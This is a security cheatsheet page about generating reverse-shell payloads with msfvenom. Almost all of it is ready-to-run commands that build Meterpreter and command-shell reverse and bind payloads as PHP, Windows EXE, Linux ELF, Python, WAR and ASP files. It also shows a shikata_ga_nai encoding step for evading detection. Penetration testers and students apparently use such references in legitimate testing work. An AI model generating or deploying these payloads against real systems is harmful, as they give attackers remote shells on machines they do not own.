------------------------------------------------------------------------------------- / _ \ \_\(_)/_/ _//"\\_ JOHLEM.net / \ https://johlem.net/V1/topics/cheatsheet.php ------------------------------------------------------------------------------------- --- Reverse Shell with Msfvenom - Cheatsheet ### List payloads {% highlight Shell %} ```Shell msfvenom -l ``` {% endhighlight %} Or {% highlight Shell %} ```Shell msfvenom --list payloads ``` {% endhighlight %} ### Generate a PHP payload {% highlight Shell %} ```Shell msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php ``` {% endhighlight %} ### Generate a Windows payload ##### Meterpreter - Reverse shell (x64): {% highlight Shell %} ```Shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe ``` {% endhighlight %} ##### Meterpreter - Reverse shell: {% highlight Shell %} ```Shell msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe ``` {% endhighlight %} ##### Meterpreter - Bind shell: {% highlight Shell %} ```Shell msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe ``` {% endhighlight %} ##### CMD - Reverse shell: {% highlight Shell %} ```Shell msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe ``` {% endhighlight %} ### Generate a Linux payload ##### Meterpreter - Reverse shell: {% highlight Shell %} ```Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin ``` {% endhighlight %} ### Generate a Python payload {% highlight Shell %} ```Shell msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py ``` {% endhighlight %} ### Generate a WAR payload {% highlight Shell %} ```Shell msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war ``` {% endhighlight %} ### Generate an ASP payload {% highlight Shell %} ```Shell msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp ``` {% endhighlight %} ### Generate encoded payloads ##### Shikata\_ga\_nai {% highlight Shell %} ```Shell msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse ``` {% endhighlight %}